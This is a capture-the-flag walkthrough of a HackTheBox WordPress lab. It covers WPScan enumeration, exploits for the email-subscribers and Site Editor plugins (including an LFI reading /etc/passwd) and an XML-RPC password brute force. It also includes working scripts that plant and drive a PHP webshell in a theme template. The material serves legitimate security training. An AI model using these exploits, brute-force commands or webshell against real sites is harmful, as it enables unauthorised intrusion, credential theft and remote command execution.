HackTheBox - Hacking WordPress - Skills Assessment Walkthrough

Ido Abramov

Scenario

You have been contracted to perform an external penetration test against the company INLANEFREIGHT that is hosting one of their main public-facing websites on WordPress.

Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.

Walkthrough

Target system: 10.129.204.37

While navigating the website, we notice a 'Blog' button that points at the virtual host blog.inlanefreight.local. That name does not resolve on our attack box, so we map it to the target IP in /etc/hosts:

sudo sh -c 'echo "10.129.204.37 blog.inlanefreight.local" >> /etc/hosts'

And we're ready to start!

Q1 - Identify the WordPress version number.

Solution:

We can do this manually by reviewing the page source (the generator meta tag), the ?ver= query strings on CSS and JavaScript assets, and readme.html. However, I will use the WPScan tool to quickly gather information about the WordPress installation; the same output answers the next few questions:

wpscan --url http://blog.inlanefreight.local

The WordPress version is reported in the scan output.
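The manual route mentioned above can be scripted. The following is an added example (not the post's code): it pulls the version out of the generator meta tag and, as a fallback, tallies the ?ver= query strings on wp-includes assets. The TARGET value and the sample HTML are constructed for this example; the version numbers in the sample are placeholders, not the target's.

```sh
#!/bin/sh
# Added example, not from the original post. TARGET is an assumption.
TARGET="${TARGET:-http://blog.inlanefreight.local}"

# Pull the version out of <meta name="generator" content="WordPress X.Y.Z">.
# Prints nothing if the tag was removed (a common hardening step).
wp_version_from_html() {
  sed -n 's/.*<meta name="generator" content="WordPress \([0-9][0-9.]*\)".*/\1/p' | head -n 1
}

# Fallback: tally the ?ver= values on wp-includes assets. Core CSS/JS carry the
# WordPress version; bundled libraries (jQuery, etc.) carry their own, so the
# most frequent value is the one to trust. Output: "version count" per line.
wp_versions_from_assets() {
  grep -o 'wp-includes/[^" ]*?ver=[0-9][0-9.]*' \
    | sed 's/.*?ver=//' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $2, $1 }'
}

# Constructed sample page for offline use; the version numbers are placeholders.
SAMPLE_HTML='<html><head>
<meta name="generator" content="WordPress 5.2.4" />
<link rel="stylesheet" href="http://blog.inlanefreight.local/wp-includes/css/dist/block-library/style.min.css?ver=5.2.4" />
<script src="http://blog.inlanefreight.local/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
<script src="http://blog.inlanefreight.local/wp-includes/js/wp-embed.min.js?ver=5.2.4"></script>
</head><body></body></html>'

printf 'generator tag: %s\n' "$(printf '%s\n' "$SAMPLE_HTML" | wp_version_from_html)"
printf 'asset tally (version count):\n'
printf '%s\n' "$SAMPLE_HTML" | wp_versions_from_assets

# Against the real target (network access needed): RUN_LIVE=1 sh wpver.sh
if [ "${RUN_LIVE:-0}" = 1 ]; then
  page=$(curl -s "$TARGET/")
  printf '%s\n' "$page" | wp_version_from_html
  printf '%s\n' "$page" | wp_versions_from_assets
fi
```

The asset tally matters because third-party libraries such as jQuery carry their own ?ver= value, so the most frequent version across wp-includes assets, not any single one, is the core version.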

Q2 - Identify the WordPress theme in use.

Solution:

The same scan output reports the active theme:

The theme in use is listed there.

Q3 - Submit the contents of the flag file in the directory with directory listing enabled.

Solution:

The first scan already reported that the upload directory has directory listing enabled:

Let's navigate to http://blog.inlanefreight.local/wp-content/uploads/:

The listing shows an upload_flag.txt file; open it:

Flag found!

Q4 - Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)

Solution:

Let's run WPScan's enumeration against the site. With no value, --enumerate defaults to vp,vt,tt,cb,dbe,u,m, which includes user IDs (u); --enumerate u would restrict the run to users only:

wpscan --url http://blog.inlanefreight.local --enumerate

The users found through this process are listed in the output:

A non-admin user has been found!

Q5 - Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Solution:

The initial scan in question 1 flagged three plugins as out of date. Note that without a WPVulnDB/WPScan API token (--api-token) WPScan only reports the version as outdated and does not list the known vulnerabilities, so we have to look those up ourselves:

  • email-subscribers version 4.2.2

  • site-editor version 1.1.1

  • the-events-calendar version 5.1.2.1

The next step is to find a known vulnerability in one of these plugins that allows downloading files without authentication.

After some Google searching, we found the following Exploit-DB entry:

https://www.exploit-db.com/exploits/48698

This exploit takes advantage of the outdated email-subscribers plugin to download its user report without authentication. Let's reproduce it with curl, requesting the path given in the exploit:

curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'

The response contains the flag:

Flag found!

Q6 - What is the version number of the plugin vulnerable to an LFI?

Solution:

We ran another search for vulnerabilities in the three outdated plugins identified above (email-subscribers 4.2.2, site-editor 1.1.1, the-events-calendar 5.1.2.1), this time looking specifically for Local File Inclusion (LFI) issues. The plugin affected is site-editor, so its version number, 1.1.1, is the answer.

Q7 - Use the LFI to identify a system user whose name starts with the letter "f".

Solution:

We just need to use a known exploit for site-editor version 1.1.1 to exploit the LFI vulnerability.

You can find the exploit on Exploit-DB:

https://www.exploit-db.com/exploits/44340

Now, let’s use the PoC (Proof-of-Concept):

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Substituting our target host, the request becomes:

http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

The response includes the contents of /etc/passwd, which lists the user whose name starts with "f".
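To make the user hunt repeatable, here is an added example script (not the post's code) that reads a file through the Site Editor LFI with curl and filters passwd-format output by username prefix. The hostname and the passwd sample are constructed; the sample names are placeholders and not the target's users.

```sh
#!/bin/sh
# Added example, not from the original post. TARGET is an assumption.
TARGET="${TARGET:-http://blog.inlanefreight.local}"
LFI_PATH="wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"

# Read a file through the Site Editor 1.1.1 LFI. curl -G --data-urlencode puts the
# path into the query string with proper encoding, so paths with spaces or
# special characters survive.
lfi_read() {
  curl -s -G "$TARGET/$LFI_PATH" --data-urlencode "ajax_path=$1"
}

# Filter passwd-format text on stdin: print "name uid=N shell=S" for every account
# whose login name starts with the given prefix. Lines without 7 colon-separated
# fields (HTML or JSON the endpoint may wrap around the file) are ignored, and
# service accounts are kept, since the "system user" asked for may be one.
passwd_users_with_prefix() {
  awk -F: -v p="$1" 'NF >= 7 && index($1, p) == 1 { printf "%s uid=%s shell=%s\n", $1, $3, $7 }'
}

# Constructed sample of what an LFI response can look like; names are placeholders,
# not the target's users. The last line stands in for a non-passwd trailer.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
fsample:x:1001:1001:constructed sample user:/home/fsample:/bin/bash
{"success":true,"data":{"output":[]}}'

printf '%s\n' "$PASSWD_SAMPLE" | passwd_users_with_prefix f

# Against the real target (network access needed): RUN_LIVE=1 sh lfi_users.sh
if [ "${RUN_LIVE:-0}" = 1 ]; then
  lfi_read /etc/passwd | passwd_users_with_prefix f
fi
```

Printing the shell alongside the name lets you tell interactive accounts from service accounts at a glance without discarding either.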

Q8 - Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

Solution:

First, we need to find the credentials of an admin user:

wpscan --password-attack xmlrpc -t 20 -U erika,admin -P ./Desktop/rockyou.txt --url http://blog.inlanefreight.local

--password-attack xmlrpc - authenticate through the XML-RPC interface (xmlrpc.php) instead of the wp-login.php form; this requires XML-RPC to be enabled on the target.

-t 20 - number of concurrent threads.

-U erika,admin - usernames to attack (the users enumerated earlier).

-P ./Desktop/rockyou.txt - wordlist to try for each user.

WPScan reports a valid username and password for an admin user.

Next, navigate to the WordPress login page at http://blog.inlanefreight.local/wp-admin (which redirects to wp-login.php) and log in with Erika's credentials:

In the dashboard, go to Appearance > Theme Editor:

Open a template of an inactive theme (I used twentyseventeen), so the live site keeps working, and insert the PHP webshell code at the top of the 404 template file:

Finally, click Update File.

Then, use curl to interact with the webshell by requesting the edited template directly and passing the command as a parameter.

First, run whoami to verify it's working:

And it works!

Then, list /home/erika, locate the flag file and output its contents:

Flag successfully found! 😁
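The webshell snippet itself and the curl calls are not shown above. The following is an added example (not the post's code) of a token-gated variant and a helper to drive it. It assumes the twentyseventeen 404 template is reachable directly at wp-content/themes/twentyseventeen/404.php and that WEBSHELL_TOKEN is changed before use.

```sh
#!/bin/sh
# Added example, not from the original post. The target URL, the template path and
# the token value are assumptions; change WEBSHELL_TOKEN before use.
TARGET="${TARGET:-http://blog.inlanefreight.local}"
SHELL_PATH="wp-content/themes/twentyseventeen/404.php"
WEBSHELL_TOKEN="${WEBSHELL_TOKEN:-change-me-before-use}"

# Write the PHP block to paste at the very top of the theme's 404.php in
# Appearance > Theme Editor. The token check stops anyone else who stumbles on
# the edited template from running commands, and exit keeps the rest of the
# template (get_header() and friends) from executing when the file is requested
# directly. Revert the edit when the engagement ends.
write_webshell() {
  cat > "$1" <<EOF
<?php
// Assessment webshell, token-gated. REMOVE this edit when the engagement ends.
if (isset(\$_GET['cmd'], \$_GET['t']) && hash_equals('$WEBSHELL_TOKEN', (string) \$_GET['t'])) {
    header('Content-Type: text/plain');
    system(\$_GET['cmd']);
    exit;
}
?>
EOF
  printf '%s\n' "$1"
}

# Run a command through the edited template. The theme does not need to be
# active: PHP files under wp-content/themes are normally reachable directly.
# --data-urlencode handles spaces and slashes in the command.
run_cmd() {
  curl -s -G "$TARGET/$SHELL_PATH" \
    --data-urlencode "t=$WEBSHELL_TOKEN" \
    --data-urlencode "cmd=$1"
}

write_webshell ./webshell_404.php   # paste this file's contents into 404.php

# Against the real target (network access needed): RUN_LIVE=1 sh webshell.sh
if [ "${RUN_LIVE:-0}" = 1 ]; then
  run_cmd 'whoami'
  run_cmd 'ls -la /home/erika'
fi
```

Editing an inactive theme keeps the live site intact, but the edited file is still reachable by anyone who guesses its URL, which is why the snippet checks a token; the cleanup step at the end of the engagement is to restore the original 404.php.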
